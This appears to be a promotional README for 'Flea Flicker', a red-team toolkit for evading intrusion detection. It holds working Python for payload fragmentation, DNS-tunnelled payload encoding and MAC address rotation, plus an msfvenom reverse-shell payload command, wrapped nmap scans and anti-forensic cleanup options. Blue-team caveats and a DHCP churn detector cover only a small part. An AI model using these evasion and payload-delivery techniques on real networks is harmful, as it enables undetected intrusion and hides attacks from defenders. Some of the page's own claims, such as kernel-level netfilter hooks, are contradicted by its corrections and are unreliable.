Flea Flicker NetFilter: Network Evasion Toolkit

Netfilter hooks for packet manipulation. Deep packet inspection evasion. Protocol impersonation. MAC address rotation. Red team toolkit for penetration testing on authorized networks. Evades IDS, confuses behavioral analysis, fragments payloads, hides in legitimate traffic.

Flea Flicker NetFilter

IDS blocks your scans. ML detects your payloads. Behavioral analysis flags your timing. Your pentest is over before it starts.

Flea Flicker manipulates packets before the IDS sees them: fragment payloads, randomize timing, impersonate protocols, so what reaches the wire looks legitimate and the IDS has nothing to match. Manual control over packet behavior, not automated evasion and not script kiddie tools. One correction to the name: the implementation described further down runs in user space on scapy raw sockets, not in kernel netfilter hooks. The interception point is the raw socket on your own host, before the packet leaves for the network.

Fragment, Delay, Impersonate: Kernel-Level Evasion

Deep Packet Inspection Evasion

IDS reads packet contents. Pattern matching catches exploits. Signature detection blocks payloads. Flea Flicker fragments your attack across multiple packets: encrypt at the application layer before the network layer, insert random padding between fragments, reassemble only at destination. Two caveats a practitioner needs. Snort and Suricata reassemble IP fragments and TCP streams before matching, so fragmentation alone does not hide a plaintext signature; the application-layer encryption is what keeps the reassembled stream from matching. And reassembly at destination means something at the far end has to decrypt and reassemble, a stager or a listener you control, so this is an end-to-end channel, not a transparent filter in front of any tool.

Normal Metasploit payload:
[TCP Header][Exploit Code]
↓ IDS sees exploit signature, blocks

Flea Flicker:
[TCP Header][Fragment 1 + Padding]
[TCP Header][Fragment 2 + Padding]
[TCP Header][Fragment 3 + Padding]
↓ IDS sees padded fragments, or ciphertext once it reassembles: no signature match
↓ Target reassembles into exploit
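The framing the diagram describes, as an added example that is not part of the Flea Flicker code: split a payload into fixed-size fragments, pad each with random bytes, and reassemble at the far end whatever the arrival order. The frame layout is my own choice for the example, and encryption (which belongs before fragment() per the text above) is left out so the framing is visible.

```python
import hashlib
import os
import random
import struct
from typing import List, Optional

# Added example, not Flea Flicker's own code. Frame layout chosen for the example:
#   magic(2) | seq(2) | total(2) | data_len(2) | data | random padding
MAGIC = b"FF"
HEADER = struct.Struct(">2sHHH")


def fragment(payload: bytes, fragment_size: int = 64, max_pad: int = 32,
             seed: Optional[int] = None) -> List[bytes]:
    """Split payload into frames carrying up to fragment_size bytes each,
    followed by 0..max_pad bytes of random padding that the receiver drops."""
    if fragment_size <= 0:
        raise ValueError("fragment_size must be positive")
    rng = random.Random(seed)
    chunks = [payload[i:i + fragment_size]
              for i in range(0, len(payload), fragment_size)] or [b""]
    frames = []
    for seq, chunk in enumerate(chunks):
        pad = os.urandom(rng.randint(0, max_pad))
        frames.append(HEADER.pack(MAGIC, seq, len(chunks), len(chunk)) + chunk + pad)
    return frames


def reassemble(frames: List[bytes]) -> bytes:
    """Rebuild the payload from frames in any order. A missing, duplicate,
    truncated or inconsistent fragment raises, so a partial transfer is
    never silently accepted as the whole payload."""
    parts = {}
    total = None
    for frame in frames:
        if len(frame) < HEADER.size:
            raise ValueError("frame too short")
        magic, seq, n, data_len = HEADER.unpack_from(frame)
        if magic != MAGIC:
            raise ValueError("not a fragment frame")
        if len(frame) < HEADER.size + data_len:
            raise ValueError("truncated fragment %d" % seq)
        if total is None:
            total = n
        elif n != total:
            raise ValueError("inconsistent fragment count")
        if seq in parts:
            raise ValueError("duplicate fragment %d" % seq)
        parts[seq] = frame[HEADER.size:HEADER.size + data_len]
    if total is None or set(parts) != set(range(total)):
        raise ValueError("missing fragments")
    return b"".join(parts[i] for i in range(total))


def accepts(frames: List[bytes]) -> bool:
    """True if the frames reassemble cleanly, False if anything is wrong."""
    try:
        reassemble(frames)
        return True
    except ValueError:
        return False


def roundtrip(payload: bytes, fragment_size: int = 64, seed: int = 1) -> bool:
    """Fragment, shuffle the delivery order, reassemble, compare digests."""
    frames = fragment(payload, fragment_size, seed=seed)
    random.Random(seed).shuffle(frames)
    return (hashlib.sha256(reassemble(frames)).digest()
            == hashlib.sha256(payload).digest())
```

The padding is what breaks fixed-offset signatures; the seq/total header is what lets the receiver refuse a truncated transfer instead of executing half a payload.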

Protocol Impersonation

Unusual protocols get flagged. Port scans detected immediately. Make attack traffic look like legitimate services.

Nmap scan on port 445:
→ SMB enumeration detected, blocked

Flea Flicker wrapped Nmap:
→ Packets look like HTTPS traffic on 443
→ Payload hidden in TLS-like structure
→ IDS sees "normal web browsing"
→ Scan proceeds undetected

The caveat: a TLS-framed packet sent to port 443 reaches the target's port 443, not its SMB service. Wrapping only enumerates SMB when something at the far end that you control (a pivot host or implant) unwraps the probes and forwards them to 445. Against a bare host the wrapped probe is just a malformed HTTPS connection, and a protocol-aware IDS can log a TLS stream that never completes a handshake.

Timing Randomization

Behavioral analysis detects patterns. Regular intervals mean automated scanning, and you get caught. Flea Flicker randomizes delays between packets (0.1 s to 5 s), injects jitter to mimic human interaction, and throttles volume to stay under detection thresholds. This targets time-series analysis, rate limiting, and correlation engines that rely on temporal clustering. The cost is wall-clock time: at an average gap of about 2.5 s, a single-port sweep of a /24 takes roughly ten minutes instead of seconds, so budget the engagement accordingly.
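An added example of the scheduling described above (not Flea Flicker's code): draw each inter-packet gap from a range, cap the number of sends in any 60 second window, and compute the regularity statistic a time-series detector would use to tell a fixed-interval scanner from jittered traffic. The threshold of 30 sends per minute is an assumed sample value.

```python
import random
import statistics
from typing import List, Optional, Tuple

# Added example, not Flea Flicker's own code: jittered send schedule with a
# per-minute volume throttle, plus the gap statistic a detector computes.


def schedule(n_packets: int, delay_range: Tuple[float, float] = (0.1, 5.0),
             max_per_minute: int = 30, seed: Optional[int] = None) -> List[float]:
    """Return send offsets in seconds from start for n_packets.

    Each gap is drawn uniformly from delay_range. If the trailing 60 s already
    hold max_per_minute sends, the next send is pushed past the oldest of them
    so no 60 s window ever exceeds the threshold."""
    lo, hi = delay_range
    if not 0 < lo <= hi or max_per_minute < 1:
        raise ValueError("bad delay range or rate limit")
    rng = random.Random(seed)
    times: List[float] = []
    t = 0.0
    for _ in range(n_packets):
        t += rng.uniform(lo, hi)
        recent = [x for x in times if t - x < 60.0]   # times is increasing
        if len(recent) >= max_per_minute:
            t = recent[0] + 60.0 + rng.uniform(lo, hi)
        times.append(t)
    return times


def interval_cv(times: List[float]) -> float:
    """Coefficient of variation of the inter-arrival gaps: 0 for a
    fixed-interval scanner, well above 0 for jittered or human traffic."""
    gaps = [b - a for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        raise ValueError("need at least three timestamps")
    mean = statistics.fmean(gaps)
    return statistics.pstdev(gaps) / mean if mean else 0.0


def peak_rate_per_minute(times: List[float]) -> int:
    """Most sends falling in any 60 s window, the number a rate limiter sees."""
    times = sorted(times)
    best = 0
    for i, start in enumerate(times):
        best = max(best, sum(1 for x in times[i:] if x - start < 60.0))
    return best
```

Note what the throttle does to the statistic: the long pause it inserts makes the gap distribution more irregular, not less, which is the point, but the total probe count per source and destination port is unchanged, and that is what a slow-scan correlator counts.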

MAC Address Rotation

Network access control, MAC filtering, device tracking: they know your hardware. Flea Flicker rotates the MAC every N packets, spoofs the vendor OUI so the address looks like a different manufacturer's hardware, and reacquires a DHCP lease after each rotation. Use case: bypass MAC filtering on WiFi networks during an authorized pentest. Each rotation drops established TCP connections, so rotate between tasks rather than mid-session, and every new lease is a logged DHCP transaction.

Traffic Mimicry

Volume analysis spots anomalies. Attack traffic does not look like normal users. Hide in normal traffic by generating decoy traffic alongside real attacks, matching volume patterns to office hours and usage spikes, and mixing protocols (HTTP, DNS, SMTP). The real attack disappears into noise that looks like a normal user.

Technical Implementation

Built in Python with scapy for packet-layer manipulation. The FleaFlickerEvasion class wraps the core evasion engine. Scapy sends and receives through raw sockets: there is no kernel module to compile, but raw sockets still need root (or CAP_NET_RAW), and everything the interceptor emits is visible to a local packet capture on the same host. The tradeoff is performance versus portability, and this one chose portability: a user-space interceptor cannot keep up with a kernel hook under load, but it runs wherever scapy does.

from flea_flicker_evasion import FleaFlickerEvasion

ff = FleaFlickerEvasion()

# Ghost mode: fragment + randomize timing + protocol impersonation
ff.enable_ghost_mode(
    fragment_size=64,
    delay_range=(0.5, 3.0),
    impersonate_protocol="https"
)

# Shadow mode: MAC rotation + decoy traffic generation
ff.enable_shadow_mode(interface="wlan0", rotation_interval=100)

[Application] → [Payload]
      ↓
[FleaFlickerEvasion interceptor — Python/scapy]
      ↓
[Fragment + Timing Jitter + Protocol Wrap + MAC Rotation]
      ↓
[Modified packets] → [Network]
      ↓
[IDS sees: normal HTTPS traffic, variable timing, rotating hardware IDs]

MAC rotation runs on a thread. Every N packets the interface MAC changes, with the vendor OUI set to a plausible hardware manufacturer. DHCP servers tie a lease to the client's hardware address (or client identifier), so the old lease does not follow the new address: the tool reacquires a lease after each change, and to the network the device looks like new hardware joining rather than an existing device changing its address. Two consequences to plan for: any established TCP session dies with the old address, and every rotation writes a fresh DISCOVER/OFFER/REQUEST/ACK exchange into the DHCP server's log.
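An added example of the rotation described in the MAC Address Rotation section and the paragraph above (not Flea Flicker's own code): count outbound packets, pick a new address under a vendor OUI every N packets, check that it passes as globally administered hardware, and build the iproute2 commands that apply it on Linux. SAMPLE_OUIS are assumed sample prefixes (VMware and VirtualBox ranges); check the IEEE OUI registry and choose one plausible for the network you are on.

```python
import random
import re
import subprocess
from typing import List, Optional

# Added example, not Flea Flicker's own code. The OUI list is an assumption
# for the example; verify prefixes against the IEEE registry before use.
SAMPLE_OUIS = ["00:50:56", "00:0c:29", "08:00:27"]
MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")


def random_mac(oui: str, rng: random.Random) -> str:
    """Random address under the given 3-octet OUI."""
    parts = oui.lower().split(":")
    if len(parts) != 3 or any(len(p) != 2 for p in parts):
        raise ValueError("OUI must be three colon-separated octets")
    return ":".join(parts + ["%02x" % rng.randrange(256) for _ in range(3)])


def looks_like_vendor_mac(mac: str) -> bool:
    """True when the address is unicast and globally administered: bit 0 (I/G)
    and bit 1 (U/L) of the first octet are both clear. A locally administered
    address such as 02:... is the usual tell of a spoofed MAC."""
    mac = mac.lower()
    if not MAC_RE.match(mac):
        return False
    return int(mac[:2], 16) & 0b11 == 0


class MacRotator:
    def __init__(self, interface: str, every: int = 100,
                 ouis: List[str] = SAMPLE_OUIS, seed: Optional[int] = None):
        if every <= 0:
            raise ValueError("rotation interval must be positive")
        self.interface = interface
        self.every = every
        self.ouis = ouis
        self.rng = random.Random(seed)
        self.count = 0
        self.history: List[str] = []

    def on_packet(self) -> Optional[str]:
        """Call once per outbound packet; returns the new MAC when a rotation
        is due, otherwise None."""
        self.count += 1
        return self.rotate() if self.count % self.every == 0 else None

    def rotate(self) -> str:
        mac = random_mac(self.rng.choice(self.ouis), self.rng)
        self.history.append(mac)
        return mac

    def apply_commands(self, mac: str) -> List[List[str]]:
        """iproute2 sequence; the link has to be down to change its address."""
        dev = ["ip", "link", "set", "dev", self.interface]
        return [dev + ["down"], dev + ["address", mac], dev + ["up"]]

    def apply(self, mac: str, dry_run: bool = True) -> List[List[str]]:
        """Run the commands (root required). Taking the link down drops live
        connections and the lease; renew DHCP afterwards with your client."""
        cmds = self.apply_commands(mac)
        if not dry_run:
            for cmd in cmds:
                subprocess.run(cmd, check=True)
        return cmds
```

On Wi-Fi, the down/up cycle also forces a re-association, so the access point and any NAC behind it see a brand new station each time; on a wired port with port security enabled, a second hardware address on the same port can shut the port down outright.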

Real-World Scenario

Objective: enumerate SMB shares on a corporate network with IDS deployed.

Without Flea Flicker:

$ nmap -p 445 --script smb-enum-shares 10.0.0.0/24
→ IDS detects: Port scan + SMB enumeration
→ Alert triggered
→ IP blocked
→ Pentest detected

With Flea Flicker:

$ flea-flicker --mode ghost --protocol https \
  nmap -p 445 --script smb-enum-shares 10.0.0.0/24

→ Each host's probes fragmented across a 20-second window
→ Traffic appears as HTTPS on port 443
→ Timing randomized (looks like browsing)
→ IDS sees: Normal web traffic
→ Scan completes undetected
→ Pentest proceeds

Pentest Integration

Metasploit payload wrapping:

# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin

# Wrap with Flea Flicker
flea-flicker --wrap payload.bin \
  --protocol dns --fragment-size 64 --delay 0.5-3.0

# Deliver wrapped payload
# Target receives fragments over DNS
# IDS sees legitimate DNS queries
# Payload reassembles and executes
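The DNS wrap in the Metasploit example above, and the protocol impersonation section before it, both come down to carrying bytes inside query names that an ordinary resolver will forward. As an added example (not Flea Flicker's code), here is one encoding and its decoder: each query is an 8-hex-character sequence/total label, base32 labels of the chunk, and your domain. The decoder has to run on a server you control that is authoritative for that domain; the domain name below is an assumed placeholder.

```python
import base64
from typing import Dict, List

# Added example, not Flea Flicker's own code: payload bytes carried in DNS
# query names. Label and name limits come from RFC 1035.
MAX_LABEL = 63
MAX_NAME = 253


def encode_queries(payload: bytes, domain: str = "cdn.example.com",
                   chunk: int = 60) -> List[str]:
    """One query name per chunk; raises if a name would exceed the DNS limit."""
    if not 1 <= chunk <= 120:
        raise ValueError("chunk must be 1..120 bytes")
    chunks = [payload[i:i + chunk] for i in range(0, len(payload), chunk)] or [b""]
    names = []
    for seq, data in enumerate(chunks):
        b32 = base64.b32encode(data).decode().rstrip("=").lower()
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join(["%04x%04x" % (seq, len(chunks))] + labels + [domain])
        if len(name) > MAX_NAME:
            raise ValueError("name too long; use a smaller chunk or shorter domain")
        names.append(name)
    return names


def decode_queries(names: List[str], domain: str = "cdn.example.com") -> bytes:
    """Rebuild the payload from observed query names. Order does not matter and
    duplicates are expected: resolvers retransmit, so a repeated query for the
    same fragment must not break reassembly."""
    suffix = "." + domain
    parts: Dict[int, bytes] = {}
    total = None
    for name in names:
        if not name.endswith(suffix):
            continue                      # unrelated query, ignore it
        labels = name[:-len(suffix)].split(".")
        seq, n = int(labels[0][:4], 16), int(labels[0][4:], 16)
        if total is None:
            total = n
        elif n != total:
            raise ValueError("inconsistent fragment count")
        b32 = "".join(labels[1:]).upper()
        data = base64.b32decode(b32 + "=" * (-len(b32) % 8))
        if parts.get(seq, data) != data:
            raise ValueError("conflicting data for fragment %d" % seq)
        parts[seq] = data
    if total is None or set(parts) != set(range(total)):
        raise ValueError("missing fragments")
    return b"".join(parts[i] for i in range(total))
```

The detection caveat is the mirror image of the technique: long, high-entropy subdomains, hundreds of unique names under one zone and a query rate no browser produces are among the most heavily signatured things in DNS monitoring, and a resolver that logs queries keeps every fragment.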

Burp Suite extension:

[Burp Repeater]
     ↓
[Flea Flicker Proxy]
     ↓
[Obfuscated HTTP requests]
     ↓
[Target Web App]

WAF sees fragmented, time-delayed requests. Whether that gets past it depends on where the WAF inspects: a proxy-based WAF terminates the connection and matches on the reassembled request, so fragmentation buys nothing there and the gain is only against per-burst rate limits. Confirm which kind you face in the lab before relying on it.

Nmap evasion:

# Standard aggressive scan (detected immediately)
nmap -A -T4 target.com

# Flea Flicker wrapped (evades detection)
flea-flicker --mode shadow --timing random \
  nmap -A -T2 target.com

Installation

git clone https://github.com/ghostintheprompt/flea-flicker-netfilter
cd flea-flicker-netfilter
pip3 install psutil scapy
sudo ./install.sh
python3 netfilter.py --help

Requires Python 3.8+ and root access for raw socket operations. Compatible with Kali, ParrotOS, Ubuntu, Debian. No kernel module compilation — scapy handles packet interception at the raw socket layer.

Basic Usage

Ghost Mode (DPI evasion):

flea-flicker --mode ghost [command]
flea-flicker --mode ghost nmap -A target.com

Shadow Mode (MAC rotation + traffic mimicry):

flea-flicker --mode shadow --interface wlan0
# Continuous MAC rotation every 100 packets
# Generates decoy traffic automatically

Protocol Impersonation:

flea-flicker --protocol https nmap -p 445 target.com
flea-flicker --protocol dns [command]

Custom configuration:

flea-flicker --fragment-size 64 \
  --delay 0.5-3.0 \
  --protocol https \
  --mac-rotation 100 \
  [command]

Operational Security

Runs memory-only by default. No logs written, configuration in RAM, minimal disk artifacts.

flea-flicker --cleanup
flea-flicker --emergency-shutdown
flea-flicker --self-destruct 60 [command]

Anti-forensics: clears command history entries, removes temporary files, resets network state, which should include putting the interface's original MAC back. There are no kernel module traces to wipe because there is no kernel module; the interceptor is user-space Python. On an authorized engagement, treat history and log wiping on client-owned hosts as out of scope unless the rules of engagement say otherwise, and remember that an emergency shutdown which leaves a rotated MAC in place will confuse the client's own asset inventory.

Built Because ML-Based IDS Killed the Standard Pentest

Built this after a pentest where the client had deployed ML-based IDS. Standard Nmap was instant detection. Metasploit payloads got blocked immediately. Needed packet manipulation before IDS could analyze anything.

The interceptor sits between the wrapped tool and the wire and rewrites outbound traffic before it leaves the host, in user space via scapy raw sockets rather than a kernel netfilter hook, whatever the name suggests. Fragment payloads. Randomize timing. Impersonate protocols. IDS sees fragmented, delayed traffic that looks legitimate.

Built to evade commercial IDS/IPS, behavioral analysis, signature detection, and timing correlation. Does not work against deep SSL inspection with client certs (the inspector terminates the TLS it expects to see, so a TLS-shaped wrapper that cannot complete a handshake stands out), nation-state detection (they analyze everything), or air-gapped networks.

The technique is to understand how each detection method works and evade it systematically. DPI reads content—fragment it. Timing analysis looks for patterns—randomize them. Protocol detection flags unusual traffic—impersonate legitimate services. Behavioral analysis models normal users—generate decoy traffic that matches.

For Red Teams

This gets past commercial defenses. Test in a lab first, ideally against the same IDS product the client runs. Understand the evasion techniques. Do not rely on automation: manual control over packet behavior means you decide fragmentation size, timing delays, and protocol impersonation. The tool provides capability. You provide intelligence.

For Blue Teams

Learn these techniques because attackers already use them. Update your signatures, and add the tells each evasion leaves: fragmentation with padding skews packet-size distributions, MAC rotation shows up as DHCP churn and hostnames that survive a hardware change, DNS wrapping produces long high-entropy names at high volume under one domain, and a jittered scan still hits many hosts on the same port from one source. Behavioral analysis alone is not enough: you need multi-layer detection that combines content, timing, volume, and protocol analysis.

If a red team can evade your IDS with open-source tools, real attackers already are.
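One of those tells, as an added detection example that is not part of the page or the project: the MAC rotation above leaves DHCPACK churn in the server log. The detector below parses ISC dhcpd DHCPACK lines and flags a client hostname (DHCP option 12, sent by the client and rarely rotated along with the MAC) that acquires leases under several hardware addresses within a window, and an interface that sees a burst of distinct new addresses. The log lines and the thresholds are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Added example, not from the page or the project. Matches the ISC dhcpd
# "DHCPACK on <ip> to <mac> (<hostname>) via <iface>" line behind a syslog prefix.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ dhcpd(?:\[\d+\])?: DHCPACK on "
    r"(?P<ip>\S+) to (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: \((?P<host>[^)]*)\))? via (?P<iface>\S+)")

# Constructed sample log: one laptop renewing normally, one build VM, and a
# host called "kali" that shows up under four hardware addresses in five minutes.
SAMPLE_LOG = """\
Mar 10 09:00:12 dhcp1 dhcpd[812]: DHCPACK on 10.0.0.41 to 3c:5a:b4:10:20:30 (alice-laptop) via eth1
Mar 10 09:03:45 dhcp1 dhcpd[812]: DHCPACK on 10.0.0.88 to 00:50:56:aa:01:02 (build-vm) via eth1
Mar 10 09:10:02 dhcp1 dhcpd[812]: DHCPACK on 10.0.0.91 to 00:50:56:3f:9c:21 (kali) via eth1
Mar 10 09:11:30 dhcp1 dhcpd[812]: DHCPACK on 10.0.0.92 to 00:0c:29:71:e0:44 (kali) via eth1
Mar 10 09:13:05 dhcp1 dhcpd[812]: DHCPACK on 10.0.0.93 to 08:00:27:5d:aa:19 (kali) via eth1
Mar 10 09:14:50 dhcp1 dhcpd[812]: DHCPACK on 10.0.0.94 to 00:50:56:c2:07:b8 (kali) via eth1
Mar 10 09:30:00 dhcp1 dhcpd[812]: DHCPACK on 10.0.0.41 to 3c:5a:b4:10:20:30 (alice-laptop) via eth1
"""


def parse(lines: List[str]) -> List[Dict[str, object]]:
    """Parse DHCPACK lines; non-matching lines are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%b %d %H:%M:%S")  # syslog has no year
        events.append(e)
    return events


def max_distinct_in_window(events, key: str, window_s: int) -> int:
    """Largest number of distinct `key` values seen within any window_s span."""
    events = sorted(events, key=lambda e: e["ts"])
    best = 0
    for i, start in enumerate(events):
        seen = {e[key] for e in events[i:]
                if (e["ts"] - start["ts"]).total_seconds() <= window_s}
        best = max(best, len(seen))
    return best


def detect_mac_churn(lines: List[str], window_s: int = 600,
                     per_host: int = 3, per_iface: int = 5) -> List[Tuple[str, str, int]]:
    """Return (kind, name, distinct_macs) alerts for hostnames and interfaces
    whose distinct hardware addresses inside one window reach the threshold."""
    events = parse(lines)
    by_host = defaultdict(list)
    by_iface = defaultdict(list)
    for e in events:
        if e["host"]:
            by_host[e["host"]].append(e)
        by_iface[e["iface"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        n = max_distinct_in_window(evs, "mac", window_s)
        if n >= per_host:
            alerts.append(("host", host, n))
    for iface, evs in by_iface.items():
        n = max_distinct_in_window(evs, "mac", window_s)
        if n >= per_iface:
            alerts.append(("iface", iface, n))
    return alerts
```

The hostname check is the cheap one and catches a tool that rotates the hardware address but not the name the client sends; the per-interface count is the fallback for a tool that rotates both, at the cost of a threshold you have to tune against normal device turnover on that segment.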


Authorized pentests only. Written permission required. Federal prison is real.

github.com/ghostintheprompt/flea-flicker-netfilter


GhostInThePrompt.com // IDS reads content. Fragment it. Reads timing. Randomize it. Reads protocol. Impersonate it.